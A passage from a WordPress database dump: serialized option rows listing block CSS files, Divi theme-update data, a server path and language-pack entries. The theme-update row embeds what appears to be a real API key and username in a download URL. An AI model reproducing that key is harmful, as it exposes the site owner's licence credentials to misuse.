yle.min.css\";i:440;s:19:\"quote/theme-rtl.css\";i:441;s:23:\"quote/theme-rtl.min.css\";i:442;s:15:\"quote/theme.css\";i:443;s:19:\"quote/theme.min.css\";i:444;s:23:\"read-more/style-rtl.css\";i:445;s:27:\"read-more/style-rtl.min.css\";i:446;s:19:\"read-more/style.css\";i:447;s:23:\"read-more/style.min.css\";i:448;s:18:\"rss/editor-rtl.css\";i:449;s:22:\"rss/editor-rtl.min.css\";i:450;s:14:\"rss/editor.css\";i:451;s:18:\"rss/editor.min.css\";i:452;s:17:\"rss/style-rtl.css\";i:453;s:21:\"rss/style-rtl.min.css\";i:454;s:13:\"rss/style.css\";i:455;s:17:\"rss/style.min.css\";i:456;s:21:\"search/editor-rtl.css\";i:457;s:25:\"search/editor-rtl.min.css\";i:458;s:17:\"search/editor.css\";i:459;s:21:\"search/editor.min.css\";i:460;s:20:\"search/style-rtl.css\";i:461;s:24:\"search/style-rtl.min.css\";i:462;s:16:\"search/style.css\";i:463;s:20:\"search/style.min.css\";i:464;s:20:\"search/theme-rtl.css\";i:465;s:24:\"search/theme-rtl.min.css\";i:466;s:16:\"search/theme.css\";i:467;s:20:\"search/theme.min.css\";i:468;s:24:\"separator/editor-rtl.css\";i:469;s:28:\"separator/editor-rtl.min.css\";i:470;s:20:\"separator/editor.css\";i:471;s:24:\"separator/editor.min.css\";i:472;s:23:\"separator/style-rtl.css\";i:473;s:27:\"separator/style-rtl.min.css\";i:474;s:19:\"separator/style.css\";i:475;s:23:\"separator/style.min.css\";i:476;s:23:\"separator/theme-rtl.css\";i:477;s:27:\"separator/theme-rtl.min.css\";i:478;s:19:\"separator/theme.css\";i:479;s:23:\"separator/theme.min.css\";i:480;s:24:\"shortcode/editor-rtl.css\";i:481;s:28:\"shortcode/editor-rtl.min.css\";i:482;s:20:\"shortcode/editor.css\";i:483;s:24:\"shortcode/editor.min.css\";i:484;s:24:\"site-logo/editor-rtl.css\";i:485;s:28:\"site-logo/editor-rtl.min.css\";i:486;s:20:\"site-logo/editor.css\";i:487;s:24:\"site-logo/editor.min.css\";i:488;s:23:\"site-logo/style-rtl.css\";i:489;s:27:\"site-logo/style-rtl.min.css\";i:490;s:19:\"site-logo/style.css\";i:491;s:23:\"site-logo/style.min.css\";i:492;s:27:\"site-tagline/editor-rtl.css\";i:493;s:31:\"site-tagline/editor-rtl.min.css\";i:494;s:23:\"site-tagline/editor.css\";i:495;s:27:\"site-tagline/editor.min.css\";i:496;s:26:\"site-tagline/style-rtl.css\";i:497;s:30:\"site-tagline/style-rtl.min.css\";i:498;s:22:\"site-tagline/style.css\";i:499;s:26:\"site-tagline/style.min.css\";i:500;s:25:\"site-title/editor-rtl.css\";i:501;s:29:\"site-title/editor-rtl.min.css\";i:502;s:21:\"site-title/editor.css\";i:503;s:25:\"site-title/editor.min.css\";i:504;s:24:\"site-title/style-rtl.css\";i:505;s:28:\"site-title/style-rtl.min.css\";i:506;s:20:\"site-title/style.css\";i:507;s:24:\"site-title/style.min.css\";i:508;s:26:\"social-link/editor-rtl.css\";i:509;s:30:\"social-link/editor-rtl.min.css\";i:510;s:22:\"social-link/editor.css\";i:511;s:26:\"social-link/editor.min.css\";i:512;s:27:\"social-links/editor-rtl.css\";i:513;s:31:\"social-links/editor-rtl.min.css\";i:514;s:23:\"social-links/editor.css\";i:515;s:27:\"social-links/editor.min.css\";i:516;s:26:\"social-links/style-rtl.css\";i:517;s:30:\"social-links/style-rtl.min.css\";i:518;s:22:\"social-links/style.css\";i:519;s:26:\"social-links/style.min.css\";i:520;s:21:\"spacer/editor-rtl.css\";i:521;s:25:\"spacer/editor-rtl.min.css\";i:522;s:17:\"spacer/editor.css\";i:523;s:21:\"spacer/editor.min.css\";i:524;s:20:\"spacer/style-rtl.css\";i:525;s:24:\"spacer/style-rtl.min.css\";i:526;s:16:\"spacer/style.css\";i:527;s:20:\"spacer/style.min.css\";i:528;s:20:\"table/editor-rtl.css\";i:529;s:24:\"table/editor-rtl.min.css\";i:530;s:16:\"table/editor.css\";i:531;s:20:\"table/editor.min.css\";i:532;s:19:\"table/style-rtl.css\";i:533;s:23:\"table/style-rtl.min.css\";i:534;s:15:\"table/style.css\";i:535;s:19:\"table/style.min.css\";i:536;s:19:\"table/theme-rtl.css\";i:537;s:23:\"table/theme-rtl.min.css\";i:538;s:15:\"table/theme.css\";i:539;s:19:\"table/theme.min.css\";i:540;s:23:\"tag-cloud/style-rtl.css\";i:541;s:27:\"tag-cloud/style-rtl.min.css\";i:542;s:19:\"tag-cloud/style.css\";i:543;s:23:\"tag-cloud/style.min.css\";i:544;s:28:\"template-part/editor-rtl.css\";i:545;s:32:\"template-part/editor-rtl.min.css\";i:546;s:24:\"template-part/editor.css\";i:547;s:28:\"template-part/editor.min.css\";i:548;s:27:\"template-part/theme-rtl.css\";i:549;s:31:\"template-part/theme-rtl.min.css\";i:550;s:23:\"template-part/theme.css\";i:551;s:27:\"template-part/theme.min.css\";i:552;s:24:\"term-count/style-rtl.css\";i:553;s:28:\"term-count/style-rtl.min.css\";i:554;s:20:\"term-count/style.css\";i:555;s:24:\"term-count/style.min.css\";i:556;s:30:\"term-description/style-rtl.css\";i:557;s:34:\"term-description/style-rtl.min.css\";i:558;s:26:\"term-description/style.css\";i:559;s:30:\"term-description/style.min.css\";i:560;s:23:\"term-name/style-rtl.css\";i:561;s:27:\"term-name/style-rtl.min.css\";i:562;s:19:\"term-name/style.css\";i:563;s:23:\"term-name/style.min.css\";i:564;s:28:\"term-template/editor-rtl.css\";i:565;s:32:\"term-template/editor-rtl.min.css\";i:566;s:24:\"term-template/editor.css\";i:567;s:28:\"term-template/editor.min.css\";i:568;s:27:\"term-template/style-rtl.css\";i:569;s:31:\"term-template/style-rtl.min.css\";i:570;s:23:\"term-template/style.css\";i:571;s:27:\"term-template/style.min.css\";i:572;s:27:\"text-columns/editor-rtl.css\";i:573;s:31:\"text-columns/editor-rtl.min.css\";i:574;s:23:\"text-columns/editor.css\";i:575;s:27:\"text-columns/editor.min.css\";i:576;s:26:\"text-columns/style-rtl.css\";i:577;s:30:\"text-columns/style-rtl.min.css\";i:578;s:22:\"text-columns/style.css\";i:579;s:26:\"text-columns/style.min.css\";i:580;s:19:\"verse/style-rtl.css\";i:581;s:23:\"verse/style-rtl.min.css\";i:582;s:15:\"verse/style.css\";i:583;s:19:\"verse/style.min.css\";i:584;s:20:\"video/editor-rtl.css\";i:585;s:24:\"video/editor-rtl.min.css\";i:586;s:16:\"video/editor.css\";i:587;s:20:\"video/editor.min.css\";i:588;s:19:\"video/style-rtl.css\";i:589;s:23:\"video/style-rtl.min.css\";i:590;s:15:\"video/style.css\";i:591;s:19:\"video/style.min.css\";i:592;s:19:\"video/theme-rtl.css\";i:593;s:23:\"video/theme-rtl.min.css\";i:594;s:15:\"video/theme.css\";i:595;s:19:\"video/theme.min.css\";}}','on'),(198397,'_site_transient_et_update_themes','O:8:\"stdClass\":3:{s:7:\"checked\";a:12:{s:4:\"Divi\";s:5:\"5.6.0\";s:8:\"Divi_old\";s:5:\"4.9.4\";s:13:\"blossom-coach\";s:5:\"1.5.9\";s:20:\"blossom-health-coach\";s:5:\"1.1.2\";s:9:\"clearwork\";s:5:\"1.1.3\";s:11:\"polite-blog\";s:5:\"1.0.1\";s:6:\"polite\";s:5:\"1.3.5\";s:8:\"spa-lite\";s:3:\"1.9\";s:16:\"twentytwentyfive\";s:3:\"1.0\";s:16:\"twentytwentyfour\";s:3:\"1.0\";s:17:\"twentytwentythree\";s:3:\"1.0\";s:15:\"twentytwentytwo\";s:3:\"1.0\";}s:8:\"response\";a:1:{s:4:\"Divi\";a:4:{s:11:\"new_version\";s:4:\"5.11\";s:5:\"theme\";s:4:\"Divi\";s:3:\"url\";s:54:\"https://www.elegantthemes.com/api/changelog/divi-5.txt\";s:7:\"package\";s:145:\"https://www.elegantthemes.com/api/api_downloads.php?api_update=1&theme=Divi_5&api_key=823f54e77e93bb7a68ebc39d806525b8254b50f7&username=lewiscann\";}}s:12:\"last_checked\";i:1786948840;}','off'),(199201,'can_compress_scripts','0','on'),(199249,'divi_last_dependency_change','1786948843','off'),(199252,'divi_tracked_version','5.6.0','off'),(214805,'_transient_timeout_et_core_path','1787465076','off'),(214806,'_transient_et_core_path','/home/desid573/verdenaturopathy.com.au/wp-content/themes/Divi/core','off'),(214507,'_transient_timeout_et_core_version','1787465076','off'),(214508,'_transient_et_core_version','5.6.0','off'),(214858,'_site_transient_timeout_available_translations','1787414512','off'),(214859,'_site_transient_available_translations','a:132:{s:2:\"af\";a:8:{s:8:\"language\";s:2:\"af\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-05-13 15:59:22\";s:12:\"english_name\";s:9:\"Afrikaans\";s:11:\"native_name\";s:9:\"Afrikaans\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/af.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"af\";i:2;s:3:\"afr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Gaan voort\";}}s:2:\"am\";a:8:{s:8:\"language\";s:2:\"am\";s:7:\"version\";s:6:\"6.0.14\";s:7:\"updated\";s:19:\"2022-09-29 20:43:49\";s:12:\"english_name\";s:7:\"Amharic\";s:11:\"native_name\";s:12:\"አማርኛ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.0.14/am.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"am\";i:2;s:3:\"amh\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"ቀጥል\";}}s:3:\"arg\";a:8:{s:8:\"language\";s:3:\"arg\";s:7:\"version\";s:8:\"6.2-beta\";s:7:\"updated\";s:19:\"2022-09-22 16:46:56\";s:12:\"english_name\";s:9:\"Aragonese\";s:11:\"native_name\";s:9:\"Aragonés\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.2-beta/arg.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"an\";i:2;s:3:\"arg\";i:3;s:3:\"arg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continar\";}}s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-22 09:42:33\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"متابعة\";}}s:3:\"ary\";a:8:{s:8:\"language\";s:3:\"ary\";s:7:\"version\";s:6:\"4.8.29\";s:7:\"updated\";s:19:\"2017-01-26 15:42:35\";s:12:\"english_name\";s:15:\"Moroccan Arabic\";s:11:\"native_name\";s:31:\"العربية المغربية\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.29/ary.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:3;s:3:\"ary\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"as\";a:8:{s:8:\"language\";s:2:\"as\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-03-29 23:05:25\";s:12:\"english_name\";s:8:\"Assamese\";s:11:\"native_name\";s:21:\"অসমীয়া\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/7.0.4/as.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"as\";i:2;s:3:\"asm\";i:3;s:3:\"asm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:3:\"azb\";a:8:{s:8:\"language\";s:3:\"azb\";s:7:\"version\";s:6:\"6.4.10\";s:7:\"updated\";s:19:\"2024-01-19 08:58:31\";s:12:\"english_name\";s:17:\"South Azerbaijani\";s:11:\"native_name\";s:29:\"گؤنئی آذربایجان\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/6.4.10/azb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:3;s:3:\"azb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-06 00:09:27\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:3:\"bel\";a:8:{s:8:\"language\";s:3:\"bel\";s:7:\"version\";s:6:\"4.9.31\";s:7:\"updated\";s:19:\"2026-06-07 19:51:04\";s:12:\"english_name\";s:10:\"Belarusian\";s:11:\"native_name\";s:29:\"Беларуская мова\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.9.31/bel.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"be\";i:2;s:3:\"bel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Працягнуць\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-03-02 09:00:09\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/7.0.4/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Напред\";}}s:5:\"bn_BD\";a:8:{s:8:\"language\";s:5:\"bn_BD\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-04-22 11:27:25\";s:12:\"english_name\";s:20:\"Bengali (Bangladesh)\";s:11:\"native_name\";s:15:\"বাংলা\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/7.0.4/bn_BD.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"bn\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:28:\"চালিয়ে যান\";}}s:2:\"bo\";a:8:{s:8:\"language\";s:2:\"bo\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2020-10-30 03:24:38\";s:12:\"english_name\";s:7:\"Tibetan\";s:11:\"native_name\";s:21:\"བོད་ཡིག\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/bo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bo\";i:2;s:3:\"tib\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:33:\"མུ་མཐུད་དུ།\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:6:\"6.2.10\";s:7:\"updated\";s:19:\"2023-02-22 20:45:53\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.2.10/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-18 20:51:43\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:3:\"ceb\";a:8:{s:8:\"language\";s:3:\"ceb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-02 17:25:51\";s:12:\"english_name\";s:7:\"Cebuano\";s:11:\"native_name\";s:7:\"Cebuano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/ceb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"ceb\";i:3;s:3:\"ceb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Padayun\";}}s:5:\"cs_CZ\";a:8:{s:8:\"language\";s:5:\"cs_CZ\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-21 13:27:17\";s:12:\"english_name\";s:5:\"Czech\";s:11:\"native_name\";s:9:\"Čeština\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/cs_CZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cs\";i:2;s:3:\"ces\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Pokračovat\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 08:30:50\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-05-28 13:56:30\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsæt\";}}s:5:\"de_AT\";a:8:{s:8:\"language\";s:5:\"de_AT\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-06-16 18:46:25\";s:12:\"english_name\";s:16:\"German (Austria)\";s:11:\"native_name\";s:21:\"Deutsch (Österreich)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/de_AT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:14:\"de_CH_informal\";a:8:{s:8:\"language\";s:14:\"de_CH_informal\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 11:21:22\";s:12:\"english_name\";s:30:\"German (Switzerland, Informal)\";s:11:\"native_name\";s:21:\"Deutsch (Schweiz, Du)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/7.1/de_CH_informal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-21 13:17:01\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:12:\"de_DE_formal\";a:8:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-21 13:17:35\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/translation/core/7.1/de_DE_formal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_CH\";a:8:{s:8:\"language\";s:5:\"de_CH\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-20 11:23:55\";s:12:\"english_name\";s:20:\"German (Switzerland)\";s:11:\"native_name\";s:17:\"Deutsch (Schweiz)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/de_CH.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:3:\"dsb\";a:8:{s:8:\"language\";s:3:\"dsb\";s:7:\"version\";s:6:\"6.2.10\";s:7:\"updated\";s:19:\"2022-07-16 12:13:09\";s:12:\"english_name\";s:13:\"Lower Sorbian\";s:11:\"native_name\";s:16:\"Dolnoserbšćina\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/6.2.10/dsb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"dsb\";i:3;s:3:\"dsb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Dalej\";}}s:3:\"dzo\";a:8:{s:8:\"language\";s:3:\"dzo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-06-29 08:59:03\";s:12:\"english_name\";s:8:\"Dzongkha\";s:11:\"native_name\";s:18:\"རྫོང་ཁ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/dzo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"dz\";i:2;s:3:\"dzo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-19 18:41:06\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-18 07:26:55\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-13 19:22:45\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_ZA\";a:8:{s:8:\"language\";s:5:\"en_ZA\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-07-08 10:01:54\";s:12:\"english_name\";s:22:\"English (South Africa)\";s:11:\"native_name\";s:22:\"English (South Africa)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/7.0.4/en_ZA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_NZ\";a:8:{s:8:\"language\";s:5:\"en_NZ\";s:7:\"version\";s:5:\"7.0.4\";s:7:\"updated\";s:19:\"2026-07-09 14:24:58\";s:12:\"english_name\";s:21:\"English (New Zealand)\";s:11:\"native_name\";s:21:\"English (New Zealand)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/7.0.4/en_NZ.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-13 22:25:14\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-18 09:58:20\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/7.1/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_AR\";a:8:{s:8:\"language\";s:5:\"es_AR\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-07-27 00:11:17\";s:12:\"english_name\";s:19:\"Spanish (Argentina)\";s:11:\"native_name\";s:21:\"Español de Argentina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/es_AR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CR\";a:8:{s:8:\"language\";s:5:\"es_CR\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-09 05:45:34\";s:12:\"english_name\";s:20:\"Spanish (Costa Rica)\";s:11:\"native_name\";s:22:\"Español de Costa Rica\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/es_CR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-08-21 15:41:12\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/es_MX.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CO\";a:8:{s:8:\"language\";s:5:\"es_CO\";s:7:\"version\";s:3:\"7.1\";s:7:\"updated\";s:19:\"2026-07-30 12:53:05\";s:12:\"english_name\";s:18:\"Spanish (Colombia)\";s:11:\"native_name\";s:20:\"Español de Colombia\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/7.1/es_CO.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2024-10-16 21:04:12\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.9-RC/es_PE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_VE\";a:8:{s:8:\"language\";s:5:\"es_VE\";s:7:\"version\";s:6:\"6.4.10\";s:7:\"updated\";s:19:\"2023-10-16 16:00:04\";s:12:\"english_name\";s:19:\"Spanish (Venezuela)\";s:11:\"native_name\";s:21:\"Español de Venezuela\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.4.10/es_VE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_EC\";a:8:{s:8:\"language\";s:5:\"es_EC\";s:7:\"version\";s:6:\"6.2.10\";s:7:\"updated\";s:19:\"2023-04-21 13:32:10\";s:12:\"english_name\";s:17:\"Spanish (Ecuador)\";s:11:\"native_name\";s:19:\"Español de 